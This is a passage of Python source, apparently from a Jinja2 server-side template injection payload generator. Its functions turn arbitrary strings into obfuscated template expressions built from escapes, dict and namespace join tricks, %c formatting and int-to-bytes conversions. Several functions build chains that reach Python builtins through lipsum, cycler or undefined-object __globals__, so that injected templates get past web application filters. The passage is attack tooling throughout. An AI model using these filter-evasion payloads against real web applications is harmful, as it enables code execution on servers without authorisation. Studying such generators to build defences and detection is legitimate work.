def gen_string_concat3(context: dict, value: str):
    target_list = [(LITERAL, "".join('"{}"'.format(str_escape(c, '"')) for c in value))]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_concat4(context: dict, value: str):
    target_list = [
        (LITERAL, " ".join('"{}"'.format(str_escape(c, '"')) for c in value))
    ]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_dictjoin(context: dict, value: str):
    if not re.match("^[a-zA-Z_]+$", value):
        return [(UNSATISFIED,)]
    target_list = [(LITERAL, "dict({}=i)|join".format(value))]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_dictfirst(context: dict, value: str):
    if not re.match("^[a-zA-Z_]+$", value):
        return [(UNSATISFIED,)]
    target_list = [(LITERAL, "dict({}=i)|first".format(value))]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_dictfirstreverse(context: dict, value: str):
    if not re.match("^[a-zA-Z_]+$", value):
        return [(UNSATISFIED,)]
    target_list = [(LITERAL, "dict({}=i)|first|reverse".format(value[::-1]))]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_dictlastreverse(context: dict, value: str):
    if not re.match("^[a-zA-Z_]+$", value):
        return [(UNSATISFIED,)]
    target_list = [(LITERAL, "dict({}=i)|last|reverse".format(value[::-1]))]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


# 以下规则生成的payload显著长于原string


@expression_gen
def gen_string_x1(context: dict, value: str):
    if any(ord(c) >= 128 for c in value):
        return [(UNSATISFIED,)]
    target = "".join("\\x" + hex(ord(c))[2:].zfill(2) for c in value)
    target_list = [(LITERAL, '"{}"'.format(target))]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_x2(context: dict, value: str):
    if any(ord(c) >= 128 for c in value):
        return [(UNSATISFIED,)]
    target = "".join("\\x" + hex(ord(c))[2:].zfill(2) for c in value)
    target_list = [(LITERAL, "'{}'".format(target))]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_u1(context: dict, value: str):
    if any(ord(c) >= 128 for c in value):
        return [(UNSATISFIED,)]
    target = "".join("\\u00" + hex(ord(c))[2:].zfill(2) for c in value)
    target_list = [(LITERAL, "'{}'".format(target))]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_u2(context: dict, value: str):
    if any(ord(c) >= 128 for c in value):
        return [(UNSATISFIED,)]
    target = "".join("\\u00" + hex(ord(c))[2:].zfill(2) for c in value)
    target_list = [(LITERAL, "'{}'".format(target))]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_o1(context: dict, value: str):
    if any(ord(c) >= 128 for c in value):
        return [(UNSATISFIED,)]
    target = "".join("\\" + oct(ord(c))[2:].zfill(2) for c in value)
    target_list = [(LITERAL, "'{}'".format(target))]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_o2(context: dict, value: str):
    if any(ord(c) >= 128 for c in value):
        return [(UNSATISFIED,)]
    target = "".join("\\" + oct(ord(c))[2:].zfill(2) for c in value)
    target_list = [(LITERAL, "'{}'".format(target))]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_char(context: dict, value: str):
    if len(value) != 1:
        return [(UNSATISFIED,)]
    return [(CHAR, value)]


@expression_gen
def gen_string_lowerfilternamespaceattrs1(context: dict, value: str):
    if value.upper().lower() != value or not re.match(
        r"^[A-Za-z_][A-Za-z0-9_]+$", value
    ):
        return [(UNSATISFIED,)]
    chars = [str_escape(c, '"') for c in value.upper()]
    target_list = [
        (
            LITERAL,
            "namespace({}=x)._Namespace__attrs|first|lower".format("".join(chars)),
        )
    ]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_lowerfilternamespaceattrs2(context: dict, value: str):
    if value.upper().lower() != value or not re.match(
        r"^[A-Za-z_][A-Za-z0-9_]+$", value
    ):
        return [(UNSATISFIED,)]
    chars = [str_escape(c, '"') for c in value.upper()]
    target_list = [
        (LITERAL, "namespace({}=x)._Namespace__attrs|last|lower".format("".join(chars)))
    ]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_splitdictjoin(context: dict, value: str):
    if not re.match("^[a-zA-Z_]+$", value):
        return [(UNSATISFIED,)]
    parts = [value[i : i + 3] for i in range(0, len(value), 3)]

    if len(set(parts)) != len(parts):
        return [(UNSATISFIED,)]

    target_list = [
        (LITERAL, "dict({})|join".format(",".join(f"{part}=x" for part in parts)))
    ]
    return [(EXPRESSION, precedence["plain_filter"], target_list), (REQUIRE_PYTHON3,)]


@expression_gen
def gen_string_splitdictjoin2(context: dict, value: str):
    if not re.match("^[a-zA-Z_]+$", value):
        return [(UNSATISFIED,)]
    parts = [value[i : i + 3] for i in range(0, len(value), 3)]
    targets = [(LITERAL, "dict({}=i)|join".format(part)) for part in parts]
    strings = [(EXPRESSION, precedence["plain_filter"], [target]) for target in targets]
    return [(STRING_CONCATMANY, strings), (REQUIRE_PYTHON3,)]


@expression_gen
def gen_string_splitdictjoin3(context: dict, value: str):
    if not re.match("^[a-zA-Z_]+$", value):
        return [(UNSATISFIED,)]

    if len(set(value)) != len(value):
        return [(UNSATISFIED,)]

    target_list = [
        (LITERAL, "dict({})|join".format(",".join(f"{part}=x" for part in value)))
    ]
    return [(EXPRESSION, precedence["plain_filter"], target_list), (REQUIRE_PYTHON3,)]


@expression_gen
def gen_string_splitnamespacedictjoin(context: dict, value: str):
    if not re.match("^[a-zA-Z_]+$", value):
        return [(UNSATISFIED,)]
    parts = [value[i : i + 3] for i in range(0, len(value), 3)]

    if len(set(parts)) != len(parts):
        return [(UNSATISFIED,)]

    target_list = [
        (
            LITERAL,
            "namespace({})._Namespace__attrs|join".format(
                ",".join(f"{part}=x" for part in parts)
            ),
        )
    ]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_splitnamespacedictjoin2(context: dict, value: str):
    if not re.match("^[a-zA-Z_]+$", value):
        return [(UNSATISFIED,)]
    parts = [value[i : i + 3] for i in range(0, len(value), 3)]
    targets = [
        (LITERAL, "namespace({}=x)._Namespace__attrs|join".format(part))
        for part in parts
    ]
    strings = [(EXPRESSION, precedence["plain_filter"], [target]) for target in targets]
    return [(STRING_CONCATMANY, strings)]


@expression_gen
def gen_string_splitnamespacedictjoin3(context: dict, value: str):
    if not re.match("^[a-zA-Z_]+$", value):
        return [(UNSATISFIED,)]

    if len(set(value)) != len(value):
        return [(UNSATISFIED,)]

    target_list = [
        (
            LITERAL,
            "namespace({})._Namespace__attrs|join".format(
                ",".join(f"{part}=x" for part in value)
            ),
        )
    ]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_formatpercent1(context: dict, value: str):
    # (('%c'*n)%(97,98,99))
    if len(value) != 1:
        return [(UNSATISFIED,)]
    number_tuple = [(ENCLOSE_UNDER, precedence["mod"], (INTEGER, ord(value)))]
    return [
        (
            MOD,
            (STRING_MANY_PERCENT_LOWER_C, len(value)),
            (EXPRESSION, precedence["mod"], number_tuple),
        )
    ]


@expression_gen
def gen_string_formatpercent(context: dict, value: str):
    # (('%c'*n)%(97,98,99))
    number_tuple = [
        (LITERAL, "("),
        (WHITESPACE,),
        *join_target((LITERAL, ","), [(INTEGER, ord(c)) for c in value]),
        (WHITESPACE,),
        (LITERAL, ")"),
    ]
    return [
        (
            MOD,
            (STRING_MANY_PERCENT_LOWER_C, len(value)),
            (EXPRESSION, precedence["literal"], number_tuple),
        )
    ]


@expression_gen
def gen_string_formatfunc(context: dict, value: str):
    # ('%c'*n)|format(97,98,99)
    req = []
    manypc = (STRING_MANY_PERCENT_LOWER_C, len(value))
    req.append((ENCLOSE_UNDER, precedence["plain_filter"], manypc))
    req.append((LITERAL, "|format("))
    req += join_target((LITERAL, ","), [(INTEGER, ord(c)) for c in value])
    req.append((LITERAL, ")"))
    return [(EXPRESSION, precedence["called_filter"], req)]


@expression_gen
def gen_string_formatfunc2(context: dict, value: str):
    # (FORMAT(97,98,99))
    # FORMAT = (CS.format)
    # CS = (C*L)
    if re.match("^[a-z]+$", value):  # avoid infinite recursion
        return [(UNSATISFIED,)]
    if "{:c}" not in context.values():
        return [(UNSATISFIED,)]
    k = [k for k, v in context.values() if v == "{:c}"][0]
    k = (EXPRESSION, precedence["literal"], (LITERAL, k))
    cs = (MULTIPLY, k, (INTEGER, len(value)))
    format_func = (ATTRIBUTE, (LITERAL, cs), "format")
    target_list = (
        [
            (ENCLOSE_UNDER, precedence["function_call"], format_func),
            (LITERAL, "("),
        ]
        + join_target((LITERAL, ","), [(INTEGER, ord(c)) for c in value])
        + [
            (LITERAL, ")"),
        ]
    )
    return [(EXPRESSION, precedence["function_call"], target_list)]


@expression_gen
def gen_string_formatfunc3(context: dict, value: str):
    # (FORMAT(97,98,99))
    # FORMAT = (CS.format)
    # CS = (C*L)
    logger.debug("gen_string_formatfunc3: %s", value)
    if re.match("^[a-z]+$", value):  # avoid infinite recursion
        return [(UNSATISFIED,)]
    format_func = (ATTRIBUTE, (STRING_MANY_FORMAT_C, len(value)), "format")
    target_list = (
        [
            (ENCLOSE_UNDER, precedence["function_call"], format_func),
            (LITERAL, "("),
        ]
        + join_target((LITERAL, ","), [(INTEGER, ord(c)) for c in value])
        + [
            (LITERAL, ")"),
        ]
    )
    return [(EXPRESSION, precedence["function_call"], target_list)]


@expression_gen
def gen_string_chars(context: dict, value: str):
    targets = [(CHAR, c) for c in value]
    return [(STRING_CONCATMANY, targets)]


@expression_gen
def gen_string_chars2(context: dict, value: str):
    target_list = (
        [(LITERAL, "(")]
        + join_target((LITERAL, ","), [(CHAR, c) for c in value])
        + [(LITERAL, ")|join")]
    )
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_joinbyreplace(context: dict, value: str):
    # 12|replace(1,a)|replace(2,b)
    if re.search(r"\d", value) or len(value) <= 1:
        return [(UNSATISFIED,)]
    if len(value) > 2 and value[:2] == "__":
        split = 2
    elif len(value) > 2 and value[-2:] == "__":
        split = -2
    else:
        return [(UNSATISFIED,)]
    targets = targets_from_pattern(
        "{12}|replace( {1} , {STR1} {,} )|replace( {2} , {STR2} {,} )",
        {
            " ": (WHITESPACE,),
            "{12}": (INTEGER, 12),
            "{1}": (INTEGER, 1),
            "{2}": (INTEGER, 2),
            "{STR1}": (STRING, value[:split]),
            "{STR2}": (STRING, value[split:]),
            "{,}": (ONEOF, [[(LITERAL, "")], [(LITERAL, ",")]]),
        },
    )
    return [(EXPRESSION, precedence["called_filter"], targets)]


@expression_gen
def gen_string_splitdictjoincycler(context: dict, value: str):
    if not re.match("^[a-zA-Z_]{1,20}$", value):
        return [(UNSATISFIED,)]
    parts = [value[i : i + 3] for i in range(0, len(value), 3)]

    if len(set(parts)) != len(parts):
        return [(UNSATISFIED,)]

    target_list = [
        (
            LITERAL,
            "cycler.next.__globals__.concat(dict({}))".format(
                ",".join(f"{part}=x" for part in parts)
            ),
        )
    ]
    return [(EXPRESSION, precedence["function_call"], target_list), (REQUIRE_PYTHON3,)]


@expression_gen
def gen_string_lipsumtobytes4(context: dict, value: str):
    ints: List[Target] = join_target(
        sep=(LITERAL, ","), targets=[(INTEGER, ord(c)) for c in value]
    )
    bytes_targets = targets_from_pattern(
        "lipsum[GLOBALS][BUILTINS][BYTES]( ( INTS ) MAYBE_COMMA)[DECODE]( )",
        {
            "GLOBALS": (VARIABLE_OF, "__globals__"),
            "BUILTINS": (VARIABLE_OF, "__builtins__"),
            "BYTES": (VARIABLE_OF, "bytes"),
            " ": (WHITESPACE,),
            "INTS": ints,
            "MAYBE_COMMA": (ONEOF, [[(LITERAL, ",")], [(LITERAL, "")]]),
            "DECODE": (VARIABLE_OF, "decode"),
        },
    )
    return [
        (
            EXPRESSION,
            precedence["function_call"],
            bytes_targets,
        )
    ] + [(REQUIRE_PYTHON3,)]


@expression_gen
def gen_string_lipsumtobytes5(context: dict, value: str):

    bytes_targets = targets_from_pattern(
        "lipsum|attr( GLOBALS )|attr( GETITEM )( BUILTINS )"
        "|attr( GETITEM )( BYTES )( ( INTS ) MAYBE_COMMA)|attr(DECODE)( )",
        {
            "GLOBALS": (VARIABLE_OF, "__globals__"),
            "GETITEM": (VARIABLE_OF, "__getitem__"),
            "BUILTINS": (VARIABLE_OF, "__builtins__"),
            "BYTES": (VARIABLE_OF, "bytes"),
            " ": (WHITESPACE,),
            "INTS": join_target(
                sep=(LITERAL, ","), targets=[(INTEGER, ord(c)) for c in value]
            ),
            "MAYBE_COMMA": (ONEOF, [[(LITERAL, ",")], [(LITERAL, "")]]),
            "DECODE": (VARIABLE_OF, "decode"),
        },
    )
    return [
        (
            EXPRESSION,
            precedence["function_call"],
            bytes_targets,
        )
    ] + [(REQUIRE_PYTHON3,)]


@expression_gen
def gen_string_undefinedtobytes(context: dict, value: str):

    bytes_targets = targets_from_pattern(
        "UNDEFINED|attr( ADD )|attr( GLOBALS )|attr( GETITEM )( BUILTINS )"
        "|attr( GETITEM )( BYTES )( ( INTS ) MAYBE_COMMA)|attr(DECODE)( )",
        {
            "UNDEFINED": (
                ONEOF,
                [
                    [(LITERAL, "a")],
                    [(LITERAL, "t")],
                    [(LITERAL, "r")],
                    [(LITERAL, "x")],
                ],
            ),
            "ADD": (GENERATED_EXPR, (STRING, "__add__")),
            "GLOBALS": (GENERATED_EXPR, (STRING, "__globals__")),
            "GETITEM": (GENERATED_EXPR, (STRING, "__getitem__")),
            "BUILTINS": (GENERATED_EXPR, (STRING, "__builtins__")),
            "BYTES": (GENERATED_EXPR, (STRING, "bytes")),
            " ": (WHITESPACE,),
            "INTS": join_target(
                sep=(LITERAL, ","), targets=[(INTEGER, ord(c)) for c in value]
            ),
            "MAYBE_COMMA": (ONEOF, [[(LITERAL, ",")], [(LITERAL, "")]]),
            "DECODE": (GENERATED_EXPR, (STRING, "decode")),
        },
    )
    return [
        (
            EXPRESSION,
            precedence["function_call"],
            bytes_targets,
        )
    ] + [(REQUIRE_PYTHON3,)]


@expression_gen
def gen_string_intbytes1(context: dict, value: str):
    if not all(x < 128 for x in value.encode()):
        return [(UNSATISFIED,)]
    if re.match(r"^[a-zA-Z0-9]$", value):
        return [(UNSATISFIED,)]
    n = int.from_bytes(value.encode(), "big")
    targets = targets_from_pattern(
        "N.to_bytes(ARGS).decode()",
        {
            "N": (ENCLOSE_UNDER, precedence["attribute"], (INTEGER, n)),
            "ARGS": (
                ONEOF,
                [
                    [(INTEGER, len(value)), (REQUIRE_PYTHON3_SUBVERSION, 11)],
                    [
                        (INTEGER, len(value)),
                        (LITERAL, ","),
                        (GENERATED_EXPR, (STRING, "big")),
                    ],
                ],
            ),
        },
    )
    return [(EXPRESSION, precedence["function_call"], targets), (REQUIRE_PYTHON3,)]


@expression_gen
def gen_string_intbytes2(context: dict, value: str):
    if not all(x < 128 for x in value.encode()):
        return [(UNSATISFIED,)]
    if re.match(r"^[a-zA-Z0-9]$", value):
        return [(UNSATISFIED,)]
    n = int.from_bytes(value.encode(), "big")
    targets = targets_from_pattern(
        "( {BYTES:0}|map('attr','decode')|first)( )",
        {
            "BYTES": targets_from_pattern(
                "( {NUM:0}|map('attr','to_bytes')|first)(ARGS)",
                {
                    "NUM": (INTEGER, n),
                    "ARGS": (
                        ONEOF,
                        [
                            [(INTEGER, len(value)), (REQUIRE_PYTHON3_SUBVERSION, 11)],
                            [
                                (INTEGER, len(value)),
                                (LITERAL, ","),
                                (GENERATED_EXPR, (STRING, "big")),
                            ],
                        ],
                    ),
                    "'attr'": (GENERATED_EXPR, (STRING, "attr")),
                    "'to_bytes'": (GENERATED_EXPR, (STRING, "to_bytes")),
                    "0": (INTEGER, 0),
                    " ": (WHITESPACE,),
                },
            ),
            "0": (INTEGER, 0),
            "'attr'": (GENERATED_EXPR, (STRING, "attr")),
            "'decode'": (GENERATED_EXPR, (STRING, "decode")),
            " ": (WHITESPACE,),
        },
    )
    return [(EXPRESSION, precedence["function_call"], targets), (REQUIRE_PYTHON3,)]


@expression_gen
def gen_string_intbytes3(context: dict, value: str):
    if not all(x < 128 for x in value.encode()):
        return [(UNSATISFIED,)]
    if re.match(r"^[a-zA-Z0-9]$", value):
        return [(UNSATISFIED,)]
    n = int.from_bytes(value.encode(), "big")
    targets = targets_from_pattern(
        "( {BYTES:0}|map(**{'attribute':'decode'})|GETTHAT)( )",
        {
            "BYTES": targets_from_pattern(
                "( {NUM:0}|map(**{'attribute':'to_bytes'})|GETTHAT)(ARGS)",
                {
                    "NUM": (INTEGER, n),
                    "ARGS": (
                        ONEOF,
                        [
                            [(INTEGER, len(value)), (REQUIRE_PYTHON3_SUBVERSION, 11)],
                            [
                                (INTEGER, len(value)),
                                (LITERAL, ","),
                                (GENERATED_EXPR, (STRING, "big")),
                            ],
                        ],
                    ),
                    "GETTHAT": (ONEOF, [[(LITERAL, "first")], [(LITERAL, "last")]]),
                    "'attribute'": (GENERATED_EXPR, (STRING, "attribute")),
                    "'to_bytes'": (GENERATED_EXPR, (STRING, "to_bytes")),
                    "0": (INTEGER, 0),
                    " ": (WHITESPACE,),
                },
            ),
            "0": (INTEGER, 0),
            "GETTHAT": (ONEOF, [[(LITERAL, "first")], [(LITERAL, "last")]]),
            "'attribute'": (GENERATED_EXPR, (STRING, "attribute")),
            "'decode'": (GENERATED_EXPR, (STRING, "decode")),
            " ": (WHITESPACE,),
        },
    )
    return [
        (EXPRESSION, precedence["function_call"], targets),
    ]
